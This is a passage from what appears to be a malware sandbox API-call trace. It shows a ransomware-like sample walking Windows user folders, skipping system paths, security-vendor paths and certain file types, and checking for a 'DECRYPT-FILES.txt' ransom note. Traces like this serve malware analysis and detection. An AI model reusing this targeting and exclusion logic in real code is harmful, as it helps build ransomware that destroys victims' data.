HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\", lpString2="Startup\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\" [0182.440] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\", lpSrch="\\Program Files") returned 0x0 [0182.440] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\", lpSrch=":\\Windows") returned 0x0 [0182.440] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\", lpSrch="\\Games\\") returned 0x0 [0182.440] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\", lpSrch="\\Tor Browser\\") returned 0x0 [0182.440] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\", lpSrch="\\ProgramData\\") returned 0x0 [0182.440] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0182.440] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0182.440] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0182.440] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\", lpSrch="\\All Users") returned 0x0 [0182.441] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\", lpSrch="\\IETldCache\\") returned 0x0 [0182.441] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\", lpSrch="\\Local Settings\\") returned 0x0 [0182.441] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\", lpSrch="\\AppData\\Local") returned 0x0 [0182.441] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\", lpSrch="AhnLab") returned 0x0 [0182.441] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0182.441] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\") returned 92 [0182.441] lstrlenW (lpString="0a16c9.tmp") returned 10 [0182.441] wsprintfW (in: param_1=0x36fde00, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\\\0a16c9.tmp") returned 103 [0182.441] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x284 [0182.441] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\") returned 92 [0182.441] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0182.441] wsprintfW (in: param_1=0x36fde00, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\\\DECRYPT-FILES.txt") returned 110 [0182.441] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0182.441] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\") returned 92 [0182.441] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\*" [0182.441] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\*", lpFindFileData=0x36fe620 | out: lpFindFileData=0x36fe620*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xefc42dc0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xefc42dc0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4799f8 [0182.442] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0182.442] FindNextFileW (in: hFindFile=0x4799f8, lpFindFileData=0x36fe620 | out: lpFindFileData=0x36fe620*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xefc42dc0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xefc42dc0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0182.442] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0182.442] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0182.442] FindNextFileW (in: hFindFile=0x4799f8, lpFindFileData=0x36fe620 | out: lpFindFileData=0x36fe620*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xefc42dc0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xefc42dc0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xefc42dc0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0182.442] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0182.442] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0182.442] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0182.442] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0182.442] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0182.442] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0182.442] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0182.442] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0182.442] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0182.442] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0182.442] lstrlenW (lpString="0a16c9.tmp") returned 10 [0182.442] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0182.442] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0182.442] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0182.442] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0182.442] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\") returned 92 [0182.442] lstrlenW (lpString="0a16c9.tmp") returned 10 [0182.442] lstrcpyW (in: lpString1=0x36fddf0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\" [0182.442] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\0a16c9.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\0a16c9.tmp" [0182.442] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0182.442] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0182.443] CloseHandle (hObject=0x0) returned 0 [0182.443] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0182.443] FindNextFileW (in: hFindFile=0x4799f8, lpFindFileData=0x36fe620 | out: lpFindFileData=0x36fe620*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac265d40, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xac265d40, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xac265d40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0182.443] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0182.443] FindNextFileW (in: hFindFile=0x4799f8, lpFindFileData=0x36fe620 | out: lpFindFileData=0x36fe620*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28d71a60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d207440, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0182.443] lstrcmpiW (lpString1="desktop.ini", lpString2="DECRYPT-FILES.txt") returned 1 [0182.443] lstrcmpiW (lpString1="desktop.ini", lpString2="autorun.inf") returned 1 [0182.443] lstrcmpiW (lpString1="desktop.ini", lpString2="boot.ini") returned 1 [0182.443] lstrcmpiW (lpString1="desktop.ini", lpString2="desktop.ini") returned 0 [0182.443] FindNextFileW (in: hFindFile=0x4799f8, lpFindFileData=0x36fe620 | out: lpFindFileData=0x36fe620*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28d71a60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d207440, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0182.443] FindClose (in: hFindFile=0x4799f8 | out: hFindFile=0x4799f8) returned 1 [0182.443] CloseHandle (hObject=0x284) returned 1 [0182.443] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xac265d40, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xac265d40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Startup\\", cAlternateFileName="")) returned 0 [0182.443] FindClose (in: hFindFile=0x4799b8 | out: hFindFile=0x4799b8) returned 1 [0182.443] CloseHandle (hObject=0x27c) returned 1 [0182.443] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xac1f3920, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xac1f3920, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Programs\\", cAlternateFileName="")) returned 0 [0182.444] FindClose (in: hFindFile=0x479978 | out: hFindFile=0x479978) returned 1 [0182.444] CloseHandle (hObject=0x274) returned 1 [0182.444] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb012e180, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb012e180, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 1 [0182.444] lstrcmpW (lpString1="Templates", lpString2=".") returned 1 [0182.444] lstrcmpW (lpString1="Templates", lpString2="..") returned 1 [0182.444] lstrcatW (in: lpString1="Templates", lpString2="\\" | out: lpString1="Templates\\") returned="Templates\\" [0182.444] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\", lpString2="Templates\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\" [0182.444] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\", lpSrch="\\Program Files") returned 0x0 [0182.444] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\", lpSrch=":\\Windows") returned 0x0 [0182.444] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\", lpSrch="\\Games\\") returned 0x0 [0182.444] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\", lpSrch="\\Tor Browser\\") returned 0x0 [0182.444] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\", lpSrch="\\ProgramData\\") returned 0x0 [0182.444] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0182.444] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0182.444] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0182.444] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\", lpSrch="\\All Users") returned 0x0 [0182.444] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\", lpSrch="\\IETldCache\\") returned 0x0 [0182.444] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\", lpSrch="\\Local Settings\\") returned 0x0 [0182.444] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\", lpSrch="\\AppData\\Local") returned 0x0 [0182.444] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\", lpSrch="AhnLab") returned 0x0 [0182.444] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0182.444] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\") returned 74 [0182.444] lstrlenW (lpString="0a16c9.tmp") returned 10 [0182.444] wsprintfW (in: param_1=0x36fe2f8, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\\\0a16c9.tmp") returned 85 [0182.444] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\templates\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x274 [0182.445] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\") returned 74 [0182.445] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0182.445] wsprintfW (in: param_1=0x36fe2f8, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\\\DECRYPT-FILES.txt") returned 92 [0182.445] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\templates\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0182.445] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\") returned 74 [0182.445] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\*" [0182.445] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\*", lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xefc42dc0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xefc42dc0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x479978 [0182.445] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0182.445] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xefc42dc0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xefc42dc0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0182.445] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0182.445] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0182.446] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xefc42dc0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xefc42dc0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xefc42dc0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0182.446] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0182.446] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0182.446] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0182.446] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0182.446] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0182.446] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0182.446] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0182.446] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0182.446] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0182.446] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0182.446] lstrlenW (lpString="0a16c9.tmp") returned 10 [0182.446] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0182.446] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0182.446] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0182.446] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0182.446] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\") returned 74 [0182.446] lstrlenW (lpString="0a16c9.tmp") returned 10 [0182.446] lstrcpyW (in: lpString1=0x36fe2e8, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\" [0182.446] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\0a16c9.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\0a16c9.tmp" [0182.446] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0182.446] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\templates\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0182.446] CloseHandle (hObject=0x0) returned 0 [0182.446] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0182.447] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xac265d40, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xac265d40, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xac265d40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0182.447] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0182.447] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xac265d40, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xac265d40, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xac265d40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 0 [0182.447] FindClose (in: hFindFile=0x479978 | out: hFindFile=0x479978) returned 1 [0182.447] CloseHandle (hObject=0x274) returned 1 [0182.447] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xac2fe2c0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xac2fe2c0, 